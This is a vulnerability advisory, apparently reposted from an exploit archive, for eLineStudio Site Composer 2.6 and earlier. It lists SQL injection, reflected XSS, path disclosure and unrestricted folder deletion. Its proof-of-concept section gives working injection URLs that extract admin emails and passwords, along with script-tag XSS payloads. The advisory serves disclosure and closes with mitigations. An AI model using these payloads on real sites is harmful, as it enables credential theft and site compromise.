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eLineStudio Site Composer (ESC) <= 2.6 Multiple Vulnerabilities

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eLineStudio Site Composer (ESC) <= 2.6 Multiple Vulnerabilities 

#        AmnPardaz Security Research Team
# Title: eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities
# Vendor: www.elinestudio.com
# Vulnerable Version: 2.6 and prior versions
# Exploit: Available
# Impact: High
# Fix: N/A

1. Description:
    eLineStudio Site Composer is a 100% browser-based database-driven content management system that helps companies to better manage, update & share web content. eLineStudio Site Composer provides affordable & flexible licensing for end users & web developers.
2. Vulnerabilities:
    2.1. Injection Flaws, Cross Site Scripting (XSS). SQL Injection in "/ansFAQ.asp" in "id" parameter. Reflected XSS attack in "/ansFAQ.asp" in "topic" and "button" parameters.
        2.1.1. Exploit:
                        Check the exploit/POC section.
    2.2. Injection Flaws. SQL Injection in "preview.asp" in "template_id" parameter.
        2.2.1. Exploit:
                        Check the exploit/POC section.
    2.3. Information Leakage. Database path disclosure in "/cms/include/trigger.asp" and/or "/cms/include/common2.asp".
        2.3.1. Exploit:
                        Check the exploit/POC section.
    2.4. Failure to Restrict URL Access. Attacker can delete any folder on the server by "/cms/assetmanager/folderdel_.asp".
        2.4.1. Exploit:
                        Check the exploit/POC section.
    2.5. Failure to Restrict URL Access. Attacker can create folder on the server by "/cms/assetmanager/foldernew.asp".
        2.5.1. Exploit:
                        Check the exploit/POC section.
    2.6. Cross Site Scripting (XSS). Reflected XSS attack in "login.asp" in "id" and "txtEmail" parameters.
        2.6.1. Exploit:
                        Check the exploit/POC section.
3. Exploits/POCs:
    Original Exploit URL: http://bugreport.ir/index.php?/45/exploit
    3.1. SQL Injection in "/ansFAQ.asp" in "id" parameter. Reflected XSS attack in "/ansFAQ.asp" in "topic" and "button" parameters.
        Find Admin's password:
            http://[URL]/ansFAQ.asp?id=-2 union select email,password from [user] where email like '%25admin%25'
        XSS attacks:
            http://[URL]/ansFAQ.asp?id=1&topic=</title><script>alert('sdl BugReport.IR XSS')</script>
            http://[URL]/ansFAQ.asp?id=1&button="><script>alert('sdl BugReport.IR XSS')</script>
    3.2. SQL Injection in "preview.asp" in "template_id" parameter.
        Find Admin's password:
            http://[URL]/preview.asp?template_id=-1 union select 1,'[%25menu%25]' as date_created,email%2b'<br>'%2bpassword,user.*,user.*,1,2,3,4,5 from [user] where email like '%25admin%25'
    3.3. Database path disclosure in "/cms/include/trigger.asp" and/or "/cms/include/common2.asp".
    3.4. Attacker can delete any folder on the server by "/cms/assetmanager/folderdel_.asp".
    3.5. Attacker can create folder on the server by "/cms/assetmanager/foldernew.asp".
    3.6. Reflected XSS attack in "login.asp" in "id" and "txtEmail" parameters.
        http://[URL]/login.asp?id=1"><script>alert('sdl BugReport.ir XSS')</script>
        http://[URL]/login.asp?txtEmail=1"><script>alert('sdl BugReport.ir XSS')</script>
4. Solution:
    Edit the source code to ensure that inputs are properly sanitized (for 2.1, 2.2, 2.6). Rename the mentioned files in section 2.3, 2.4, 2.5, and wait for vendor patch.

#  0day.today [2024-12-27]  #